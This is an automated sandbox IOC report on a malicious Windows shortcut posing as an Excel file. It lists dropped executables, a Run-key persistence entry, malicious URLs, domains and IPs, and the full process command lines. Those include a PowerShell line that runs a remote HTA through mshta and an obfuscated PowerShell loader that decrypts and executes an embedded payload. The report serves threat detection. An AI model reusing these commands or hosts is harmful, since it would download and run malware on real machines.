IOC Report
FT. 40FE CNY .xlsx.lnk

loading gif

Files

File Path
Type
Category
Malicious
FT. 40FE CNY .xlsx.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\Users\Public\Libraries\Ucvuiswb
data
dropped
malicious
C:\Users\Public\Libraries\Ucvuiswb.PIF
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\Public\Libraries\bwsiuvcU.pif
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\Public\Libraries\easinvoker.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\Public\Libraries\netutils.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Users\Public\Ucvuiswb.url
MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF">), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\uc.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x5990b467, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\Public\Libraries\KDECO.bat
DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
dropped
C:\Users\Public\Libraries\Null
ASCII text, with CRLF line terminators
dropped
C:\Users\Public\Libraries\UcvuiswbO.bat
Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].hta
PGP Secret Sub-key -
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h2akx4p.gbt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqgntrab.1pq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzb3csfr.kno.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4fvewj.ald.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwcvnjfy.hms.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9695268fa6a0c8b2.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A20HZKL49GMHZSOAZMF6.temp
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 17 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
malicious
C:\Users\user\AppData\Roaming\uc.exe
"C:\Users\user\AppData\Roaming\uc.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
malicious
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
malicious
C:\Users\Public\Libraries\bwsiuvcU.pif
C:\Users\Public\Libraries\bwsiuvcU.pif
malicious
C:\Users\Public\Libraries\Ucvuiswb.PIF
"C:\Users\Public\Libraries\Ucvuiswb.PIF"
malicious
C:\Users\Public\Libraries\bwsiuvcU.pif
C:\Users\Public\Libraries\bwsiuvcU.pif
malicious
C:\Users\Public\Libraries\Ucvuiswb.PIF
"C:\Users\Public\Libraries\Ucvuiswb.PIF"
malicious
C:\Users\Public\Libraries\bwsiuvcU.pif
C:\Users\Public\Libraries\bwsiuvcU.pif
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://www.sessosesso.it/assets/aw/yt.htaAC:
unknown
malicious
https://www.sessosesso.it/
unknown
malicious
https://www.sessosesso.it
unknown
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://www.sessosesso.it/assets/aw/yt.hta
89.46.106.29
malicious
https://www.sessosesso.it/assets/aw/yt.htaDe
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
unknown
http://ocsp.sectigo.com0
unknown
https://www.sessosesso.it/assets/aw/yt.htahttps://www.sessosesso.it/assets/aw/yt.hta
unknown
http://crl.microsoft
unknown
https://www.sessosesso.it/assets/aw/yt.htaU
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
unknown
https://contoso.com/License
unknown
https://zyupsq.by.files.1drv.com/
unknown
https://www.sessosesso.it/assets/aw/yt.hta6288
unknown
https://www.sessosesso.it/assets/aw/yt.htaPS_BROW
unknown
https://www.sessosesso.it/assets/aw/yt.hta_
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
unknown
https://onedrive.live.com/_
unknown
https://www.sessosesso.it/assets/aw/uc.exep
unknown
https://www.sessosesso.it/assets/aw/yt.hta1
unknown
https://www.sessosesso.it/assets/aw/yt.htaindows
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://www.sessosesso.it/assets/aw/yt.hta5
unknown
https://contoso.com/
unknown
https://live.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.sessosesso.it/assets/aw/uc.exe
89.46.106.29
http://r3.o.lencr.org0
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://www.sessosesso.it/assets/aw/yt.htaH
unknown
https://sessosesso.it
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
unknown
http://nuget.org/NuGet.exe
unknown
https://sectigo.com/CPS0
unknown
https://account.dyn.com/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://www.sessosesso.it/assets/aw/yt.htaC:
unknown
https://contoso.com/Icon
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y
13.107.139.11
https://www.sessosesso.it/assets/aw/Book1.xlsx
unknown
https://github.com/Pester/Pester
unknown
https://www.sessosesso.it/assets/aw/yt.hta...-
unknown
http://mail.irmaklarpaslanmaz.com.tr
unknown
http://r3.i.lencr.org/0o
unknown
https://www.sessosesso.it/assets/aw/yt.hta...
unknown
https://sessosesso.it/assets/aw/Book1.xlsx
89.46.106.29
https://g.live.com/odclientsettings/Prod1C:
unknown
https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=
unknown
https://aka.ms/pscore68
unknown
https://www.sessosesso.it/assets/aw/yt.htaLMEMX
unknown
http://www.apache.o
unknown
http://www.pmail.com
unknown
http://ocsp.sectigo.com0C
unknown
https://onedrive.live.com/downlo
unknown
https://zyupsq.by.files.1drv.com/y4meSWi_sxRIVEad6REzmio40CREEc5i8wX7nys_a0wT5VjuHcwzIZewYF7haE8C4Cu
unknown
There are 50 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
sessosesso.it
89.46.106.29
malicious
www.sessosesso.it
89.46.106.29
malicious
mail.irmaklarpaslanmaz.com.tr
192.185.124.132
malicious
dual-spov-0006.spov-msedge.net
13.107.139.11
zyupsq.by.files.1drv.com
unknown
onedrive.live.com
unknown

IPs

IP
Domain
Country
Malicious
192.185.124.132
mail.irmaklarpaslanmaz.com.tr
United States
malicious
89.46.106.29
sessosesso.it
Italy
malicious
13.107.139.11
dual-spov-0006.spov-msedge.net
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Ucvuiswb
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
4A0000
remote allocation
page execute and read and write
malicious
2831000
direct allocation
page execute read
malicious
3DA95000
heap
page read and write
malicious
25D95000
heap
page read and write
malicious
2385000
direct allocation
page read and write
malicious
409C0000
trusted library section
page read and write
malicious
3DDE1000
trusted library allocation
page read and write
malicious
400000
unkown
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
25FC1000
trusted library allocation
page read and write
malicious
3DE32000
trusted library allocation
page read and write
malicious
3DD81000
trusted library allocation
page read and write
malicious
284A0000
trusted library section
page read and write
malicious
7EB10000
direct allocation
page read and write
malicious
40350000
trusted library section
page read and write
malicious
7FBF0000
direct allocation
page read and write
malicious
409B0000
trusted library section
page read and write
malicious
25F71000
trusted library allocation
page read and write
malicious
450000
remote allocation
page execute and read and write
malicious
3BD8F000
heap
page read and write
malicious
4A0000
remote allocation
page execute and read and write
malicious
2981000
direct allocation
page execute read
malicious
3DE5C000
trusted library allocation
page read and write
malicious
25FEB000
trusted library allocation
page read and write
malicious
450000
unkown
page execute and read and write
malicious
4A0000
remote allocation
page execute and read and write
malicious
28A1000
direct allocation
page execute read
malicious
7EB60000
direct allocation
page read and write
malicious
450000
unkown
page execute and read and write
malicious
400000
remote allocation
page execute and read and write
malicious
450000
remote allocation
page execute and read and write
malicious
3BDC9000
heap
page read and write
malicious
400000
unkown
page execute and read and write
malicious
450000
unkown
page execute and read and write
malicious
3DA65000
heap
page read and write
malicious
4A0000
unkown
page execute and read and write
malicious
40260000
trusted library section
page read and write
malicious
23FF4000
heap
page read and write
malicious
4A0000
unkown
page execute and read and write
malicious
400000
unkown
page execute and read and write
malicious
3EDE1000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
3DDAB000
trusted library allocation
page read and write
malicious
3ED31000
trusted library allocation
page read and write
malicious
4A0000
unkown
page execute and read and write
malicious
28C40000
trusted library section
page read and write
malicious
450000
remote allocation
page execute and read and write
malicious
26F71000
trusted library allocation
page read and write
malicious
3DD31000
trusted library allocation
page read and write
malicious
7FFAABAC0000
trusted library allocation
page read and write
29730000
trusted library allocation
page read and write
41C40000
trusted library allocation
page read and write
40981000
trusted library allocation
page read and write
2B001796000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
296A0000
trusted library allocation
page read and write
7FFAABB90000
trusted library allocation
page read and write
314BA7E000
stack
page read and write
41440000
trusted library allocation
page read and write
2B07C0E6000
heap
page read and write
3BE60000
heap
page read and write
409A0000
trusted library allocation
page read and write
41410000
trusted library allocation
page read and write
41C27000
trusted library allocation
page read and write
29E18250000
heap
page read and write
28D70000
trusted library allocation
page read and write
40BD0000
trusted library allocation
page read and write
1A2C41A2000
heap
page read and write
21C3411B000
heap
page read and write
28CD1000
heap
page read and write
1A2C9975000
trusted library allocation
page read and write
14976000
heap
page read and write
29700000
trusted library allocation
page read and write
780000
heap
page read and write
3BE60000
heap
page read and write
3BD7E000
heap
page read and write
41440000
trusted library allocation
page read and write
7FFAAB900000
trusted library allocation
page read and write
411C0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
13BF4000
direct allocation
page read and write
1A2C4729000
heap
page read and write
1A2C419A000
heap
page read and write
1A2C41A1000
heap
page read and write
21C33913000
heap
page read and write
40C10000
trusted library allocation
page read and write
5DA000
heap
page read and write
29E185F0000
heap
page read and write
570000
unkown
page read and write
426000
remote allocation
page execute and read and write
3BE1A000
heap
page read and write
297F0000
trusted library allocation
page read and write
7FC10000
direct allocation
page read and write
2B07C3A2000
heap
page read and write
19AC1739000
heap
page read and write
C2F37BF000
stack
page read and write
7FFAABB00000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
1A2C34A4000
heap
page read and write
21C38C00000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
29E2A0E2000
trusted library allocation
page read and write
1A2C9930000
trusted library allocation
page read and write
41560000
trusted library allocation
page read and write
40A51000
heap
page read and write
19AC1771000
heap
page read and write
1F0000
heap
page read and write
41D80000
heap
page read and write
1A2C41AB000
heap
page read and write
409B0000
trusted library allocation
page read and write
2B001846000
trusted library allocation
page read and write
40B99000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
13C18000
direct allocation
page read and write
41460000
trusted library allocation
page read and write
7FFAABA90000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
7FFAABA50000
trusted library allocation
page read and write
7FFAABAE0000
trusted library allocation
page read and write
28580000
heap
page execute and read and write
1A2C41B1000
heap
page read and write
41430000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
1A2C41B1000
heap
page read and write
24095000
heap
page read and write
41440000
trusted library allocation
page read and write
29E1BF38000
trusted library allocation
page read and write
40D000
unkown
page write copy
2A090000
heap
page read and write
40C8C000
stack
page read and write
1A2C419A000
heap
page read and write
1A2C46D0000
heap
page read and write
40B60000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
25F4000
direct allocation
page read and write
1A2C4188000
heap
page read and write
41D70000
heap
page read and write
2434000
direct allocation
page read and write
1A2C4306000
heap
page read and write
41C30000
trusted library allocation
page read and write
40A20000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
1A2C4730000
heap
page read and write
41DB0000
trusted library allocation
page read and write
3BE60000
heap
page read and write
41440000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
314B07E000
unkown
page readonly
41440000
trusted library allocation
page read and write
29FE0000
trusted library allocation
page read and write
41D70000
trusted library allocation
page read and write
3BDFE000
heap
page read and write
1A2C41BA000
heap
page read and write
1A2C435E000
heap
page read and write
40AB0000
trusted library allocation
page read and write
29690000
trusted library allocation
page read and write
296C2000
trusted library allocation
page read and write
29E182D7000
heap
page read and write
40BA0000
trusted library allocation
page read and write
41A7E000
stack
page read and write
314B27E000
unkown
page readonly
95F000
stack
page read and write
300E000
stack
page read and write
8A0000
unkown
page execute and read and write
41560000
trusted library allocation
page read and write
29730000
trusted library allocation
page read and write
7FFAABB70000
trusted library allocation
page read and write
28E0C000
stack
page read and write
314A87B000
stack
page read and write
41480000
trusted library allocation
page read and write
25B32000
trusted library allocation
page read and write
3BE60000
heap
page read and write
25C2C000
stack
page read and write
1A2C4377000
heap
page read and write
2A000000
trusted library allocation
page read and write
245A000
direct allocation
page read and write
40AD0000
trusted library allocation
page read and write
3D8F0000
heap
page read and write
314B97E000
unkown
page readonly
3D8B7000
trusted library allocation
page execute and read and write
7FFB05F46000
unkown
page readonly
41560000
trusted library allocation
page read and write
28CB000
direct allocation
page read and write
7EB40000
direct allocation
page read and write
1A2C41AB000
heap
page read and write
1413F000
stack
page read and write
2B07A300000
trusted library allocation
page read and write
7FFAAB850000
trusted library allocation
page read and write
1A2C41A1000
heap
page read and write
296C0000
trusted library allocation
page read and write
29E1C098000
trusted library allocation
page read and write
13F1E000
stack
page read and write
21C38D60000
trusted library allocation
page read and write
1A2C438D000
heap
page read and write
41440000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
41450000
trusted library allocation
page read and write
1A2C4368000
heap
page read and write
40B8C000
stack
page read and write
1A2C41AB000
heap
page read and write
41A30000
trusted library allocation
page execute and read and write
1A2C4391000
heap
page read and write
7FFAAB9F2000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
41420000
trusted library allocation
page read and write
41564000
trusted library allocation
page read and write
41345000
heap
page read and write
19C000
stack
page read and write
414B0000
trusted library allocation
page read and write
5A0000
heap
page read and write
2A000000
trusted library allocation
page read and write
41564000
trusted library allocation
page read and write
41C20000
trusted library allocation
page read and write
1A2C41D0000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C419A000
heap
page read and write
41C30000
trusted library allocation
page read and write
1405E000
stack
page read and write
1A2C42F2000
heap
page read and write
1A2C41A2000
heap
page read and write
29FE0000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
414B0000
trusted library allocation
page read and write
13FFF000
stack
page read and write
296B1000
trusted library allocation
page read and write
1A2C4326000
heap
page read and write
40B80000
trusted library allocation
page read and write
41D80000
trusted library allocation
page read and write
29CB0000
remote allocation
page read and write
41430000
trusted library allocation
page read and write
1A2C4334000
heap
page read and write
1A2C41B1000
heap
page read and write
1A2C41AB000
heap
page read and write
41263000
heap
page read and write
296F0000
trusted library allocation
page read and write
3BFAF000
stack
page read and write
1A2C41B1000
heap
page read and write
1A2C41A1000
heap
page read and write
13C4F000
direct allocation
page read and write
1A2C437F000
heap
page read and write
426000
remote allocation
page execute and read and write
D936EBE000
stack
page read and write
40A30000
trusted library allocation
page read and write
2868F000
stack
page read and write
297E0000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
572000
unkown
page write copy
1A2C9979000
trusted library allocation
page read and write
21C3387C000
heap
page read and write
29E1BDE3000
trusted library allocation
page read and write
314C37E000
unkown
page readonly
40BA0000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
3BEC0000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
3DA3F000
stack
page read and write
1A2C41BA000
heap
page read and write
41440000
trusted library allocation
page read and write
41430000
trusted library allocation
page read and write
6EC56000
unkown
page readonly
296C0000
trusted library allocation
page read and write
1A2C4366000
heap
page read and write
21C0000
direct allocation
page read and write
C2F337E000
stack
page read and write
41D80000
trusted library allocation
page read and write
41441000
trusted library allocation
page read and write
2B07A040000
heap
page read and write
4F0000
unkown
page execute and read and write
29E2A071000
trusted library allocation
page read and write
7FFAABA50000
trusted library allocation
page read and write
A80000
direct allocation
page execute and read and write
401000
unkown
page execute read
2B07A2F0000
heap
page read and write
41560000
trusted library allocation
page read and write
314B67E000
unkown
page readonly
1A2C41A2000
heap
page read and write
1A2C4364000
heap
page read and write
1A2C35B8000
trusted library allocation
page read and write
41420000
trusted library allocation
page read and write
25B80000
trusted library allocation
page execute and read and write
1A2C41C1000
heap
page read and write
6FE000
stack
page read and write
41442000
trusted library allocation
page read and write
1A2C9979000
trusted library allocation
page read and write
3BD7A000
heap
page read and write
2B07A332000
trusted library allocation
page read and write
1A2C432C000
heap
page read and write
25BDE000
stack
page read and write
41560000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
2BEE000
unkown
page read and write
314A57E000
unkown
page readonly
21C338B8000
heap
page read and write
314BD7E000
unkown
page readonly
41D70000
trusted library allocation
page read and write
29E1FE88000
trusted library allocation
page read and write
2B07C3A6000
heap
page read and write
2458000
direct allocation
page read and write
41D70000
trusted library allocation
page read and write
1A2C41BA000
heap
page read and write
1A2C430A000
heap
page read and write
41460000
trusted library allocation
page read and write
21C38F04000
heap
page read and write
41440000
trusted library allocation
page read and write
28CD0000
heap
page read and write
28E70000
trusted library allocation
page read and write
41D90000
trusted library allocation
page read and write
21C33873000
heap
page read and write
2B00041B000
trusted library allocation
page read and write
2980000
direct allocation
page readonly
314B5FE000
stack
page read and write
41430000
trusted library allocation
page read and write
3D820000
heap
page read and write
7EB90000
direct allocation
page read and write
1401F000
stack
page read and write
41470000
trusted library allocation
page read and write
1A2C430F000
heap
page read and write
21C3A000000
heap
page read and write
2B07A0E7000
heap
page read and write
297E0000
trusted library allocation
page read and write
19AC1767000
heap
page read and write
41440000
trusted library allocation
page read and write
B50000
heap
page read and write
1430E000
stack
page read and write
41D60000
trusted library allocation
page read and write
19AC18E0000
heap
page read and write
5D0000
heap
page read and write
3BD48000
heap
page read and write
1A2C42FA000
heap
page read and write
1A2C41A2000
heap
page read and write
29E182D4000
heap
page read and write
7FFB05F50000
unkown
page read and write
41450000
trusted library allocation
page execute and read and write
1A2C4188000
heap
page read and write
1A2C4398000
heap
page read and write
24084000
heap
page read and write
2985F000
unkown
page read and write
2B07C620000
heap
page read and write
1A2C9979000
trusted library allocation
page read and write
40BD0000
trusted library allocation
page read and write
1A2C41AA000
heap
page read and write
21C338A0000
heap
page read and write
3BE44000
heap
page read and write
1A2C41B1000
heap
page read and write
400000
unkown
page readonly
29E1828B000
heap
page read and write
C2F440C000
stack
page read and write
29E1C2FA000
trusted library allocation
page read and write
41D70000
trusted library allocation
page read and write
28570000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
25AE0000
heap
page read and write
414B0000
trusted library allocation
page read and write
314AE7B000
stack
page read and write
21C3385B000
heap
page read and write
13DBE000
stack
page read and write
1A2C41A1000
heap
page read and write
3BE80000
trusted library section
page read and write
1A2C3608000
trusted library allocation
page read and write
1A2C41CF000
heap
page read and write
2981E000
stack
page read and write
7EFE0000
direct allocation
page read and write
9A000
stack
page read and write
1A2C419C000
heap
page read and write
28DD0000
trusted library allocation
page read and write
41460000
trusted library allocation
page read and write
29E3273C000
heap
page read and write
41570000
trusted library allocation
page read and write
297E0000
trusted library allocation
page read and write
40AC0000
trusted library allocation
page read and write
4620000
heap
page read and write
2B07A0FF000
heap
page read and write
41460000
trusted library allocation
page read and write
21C33FF0000
trusted library allocation
page read and write
296B0000
trusted library allocation
page read and write
296C0000
trusted library allocation
page read and write
1A2C4190000
heap
page read and write
1A2C41AB000
heap
page read and write
7FFAAB936000
trusted library allocation
page execute and read and write
1A2C41AA000
heap
page read and write
296E0000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
44B000
remote allocation
page execute and read and write
3DC20000
heap
page read and write
40B90000
trusted library allocation
page read and write
D9370BE000
stack
page read and write
1A2C35C5000
trusted library allocation
page read and write
40A30000
trusted library allocation
page read and write
3D89D000
trusted library allocation
page execute and read and write
B80000
heap
page read and write
14C2D000
direct allocation
page read and write
1A2C48C1000
trusted library allocation
page read and write
19AC1620000
heap
page read and write
19AC174B000
heap
page read and write
414A0000
trusted library allocation
page read and write
7FFAABA20000
trusted library allocation
page execute and read and write
7FFAABA40000
trusted library allocation
page read and write
1A2C41AB000
heap
page read and write
41430000
trusted library allocation
page read and write
3BDA1000
heap
page read and write
40B00000
trusted library allocation
page read and write
29710000
trusted library allocation
page read and write
4185F000
stack
page read and write
41430000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
40B90000
trusted library allocation
page read and write
41296000
heap
page read and write
29710000
trusted library allocation
page read and write
1A2C41BA000
heap
page read and write
41470000
trusted library allocation
page read and write
1A2C436A000
heap
page read and write
14B26000
heap
page read and write
296C0000
trusted library allocation
page read and write
25FF3000
trusted library allocation
page read and write
29E1A553000
trusted library allocation
page read and write
1A2C419A000
heap
page read and write
40B99000
trusted library allocation
page read and write
1A2C9830000
trusted library allocation
page read and write
3BE0A000
heap
page read and write
41D60000
trusted library allocation
page read and write
1A2C4328000
heap
page read and write
1A2C4300000
heap
page read and write
7FFAABA30000
trusted library allocation
page read and write
2B07A0ED000
heap
page read and write
6EC41000
unkown
page execute read
29E324B0000
heap
page read and write
40B60000
trusted library allocation
page read and write
737000
heap
page read and write
7EC80000
direct allocation
page read and write
3BE66000
heap
page read and write
1A2C46CF000
heap
page read and write
19AC170A000
heap
page read and write
29EB0000
trusted library allocation
page read and write
29E1C1EF000
trusted library allocation
page read and write
40B80000
trusted library allocation
page read and write
40B40000
trusted library allocation
page read and write
4159E000
stack
page read and write
3BE2B000
heap
page read and write
25B47000
trusted library allocation
page execute and read and write
2420000
direct allocation
page read and write
3BED6000
heap
page read and write
97F000
stack
page read and write
28E50000
trusted library allocation
page read and write
40C00000
trusted library allocation
page read and write
1A2C41B1000
heap
page read and write
29CB000
heap
page read and write
24078000
heap
page read and write
7FFB05F50000
unkown
page read and write
41440000
trusted library allocation
page read and write
40BB0000
trusted library allocation
page read and write
7FFAABB00000
trusted library allocation
page read and write
25BE0000
heap
page read and write
41440000
trusted library allocation
page read and write
41440000
trusted library allocation
page read and write
41D60000
trusted library allocation
page read and write
7FFAAB840000
trusted library allocation
page read and write
